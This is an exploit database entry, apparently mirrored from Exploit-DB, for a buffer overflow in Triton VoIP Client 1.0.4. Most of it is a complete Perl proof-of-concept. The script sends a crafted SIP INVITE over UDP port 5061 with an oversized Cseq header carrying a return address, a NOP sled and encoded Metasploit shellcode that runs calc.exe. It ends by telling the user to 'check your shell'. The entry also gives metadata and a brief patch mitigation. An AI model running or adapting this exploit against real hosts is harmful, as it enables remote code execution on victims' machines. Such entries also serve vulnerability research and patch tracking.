Triton sipxtapi Buffer Overflow

vendor:

Triton VoIP Client

by:

c0rrupt

7.5

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: Triton VoIP Client

Affected Version From: 1.0.4

Affected Version To: 1.0.4

Patch Exists: YES

Related CWE: N/A

CPE: a:triton:triton_voip_client

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP2

2007

Triton sipxtapi Buffer Overflow

This exploit sends a specially crafted udp packet to the triton client which leads to command execution through a buffer overflow. The Triton client does not open the sipxtapi port 5061 by default. The port is open when the client attemps to try any talk session, and stays open for the remainder of the time it is running.

Mitigation:

Patch the vulnerable version of Triton.

Source

Exploit-DB raw data:

#!/usr/bin/perl
# 
# p0c
# Tested on Windows XP SP2 with triton 1.0.4
# c0rrupt -{at}- f34r -{dot}- us
#
# This exploits the sipxtapi vuln in triton which was patched.. sometime ago..
# The exploit sends a specially crafted udp packet to the triton client
# which leads to command execution through a buffer overflow.
# 
# The Triton client does not open the sipxtapi port 5061 by default.
# The port is open when the client attemps to try any talk session, and stays
# open for the remainder of the time it is running.

use IO::Socket::INET;

$target=$ARGV[0];

$MySocket=new IO::Socket::INET->new(PeerPort=>5061,Proto=>'udp',PeerAddr=>$ARGV[0]);

# win32_exec -  EXITFUNC=thread CMD=calc.exe Size=351 Encoder=PexAlphaNum http://metasploit.com
my $shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44".
"\x42\x50\x42\x50\x42\x30\x4b\x48\x45\x44\x4e\x43\x4b\x48\x4e\x37".
"\x45\x50\x4a\x47\x41\x50\x4f\x4e\x4b\x38\x4f\x44\x4a\x31\x4b\x58".
"\x4f\x35\x42\x42\x41\x50\x4b\x4e\x49\x54\x4b\x48\x46\x33\x4b\x58".
"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c".
"\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e".
"\x46\x4f\x4b\x43\x46\x45\x46\x42\x46\x30\x45\x57\x45\x4e\x4b\x58".
"\x4f\x55\x46\x32\x41\x30\x4b\x4e\x48\x36\x4b\x58\x4e\x50\x4b\x54".
"\x4b\x38\x4f\x55\x4e\x41\x41\x50\x4b\x4e\x4b\x38\x4e\x31\x4b\x38".
"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x53".
"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x37".
"\x4e\x30\x4b\x38\x42\x34\x4e\x50\x4b\x48\x42\x47\x4e\x31\x4d\x4a".
"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x30\x4b\x38\x42\x48\x42\x4b".
"\x42\x30\x42\x50\x42\x50\x4b\x48\x4a\x36\x4e\x53\x4f\x55\x41\x43".
"\x48\x4f\x42\x56\x48\x45\x49\x58\x4a\x4f\x43\x48\x42\x4c\x4b\x57".
"\x42\x55\x4a\x36\x4f\x4e\x50\x4c\x42\x4e\x42\x46\x4a\x36\x4a\x59".
"\x50\x4f\x4c\x58\x50\x50\x47\x45\x4f\x4f\x47\x4e\x43\x56\x41\x56".
"\x4e\x56\x43\x56\x50\x52\x45\x56\x4a\x47\x45\x36\x42\x50\x5a";


if (not $ARGV[0]) 
{	
	print "[+] AIM Triton 1.0.4 (and more) Exploit by c0rrupt [+]\n";
	print "[+] Greetz to n0limit, M03, Brax, raze, DiabloHorn, and everyone else [+]\n";
        print "[+] Usage: trionPWN.pl <host> [+]\n";
	exit;
}



print "[+] AIM Triton 1.0.4 (and more) Exploit by c0rrupt [+]\n";
print "[+] Greetz to n0limit, M03, Brax, raze, DiabloHorn, and everyone else [+]\n";


my $cseq = "B"x780 . "\xEB\x0C\x90\x90" . "\xd9\xe7\x01\x40" . "\x90"x500 . $shellcode;

my $packet =
"INVITE sip:a@127.0.0.1:5555 SIP/2.0\r
From: <sip:hello@127.0.0.1:5555>;tag=1c32606\r
To: sip:CFB5A74A87D97A19@192.168.1.109:5061\r
Call-Id: 65f65f65d6sexcytv\r
Cseq: $cseq";

print "[+] Packet Generated.. Sending to " . $target . "\n";

$MySocket->send($packet);

print "[+] Attack completed, check your shell.\n";

# milw0rm.com [2006-07-26]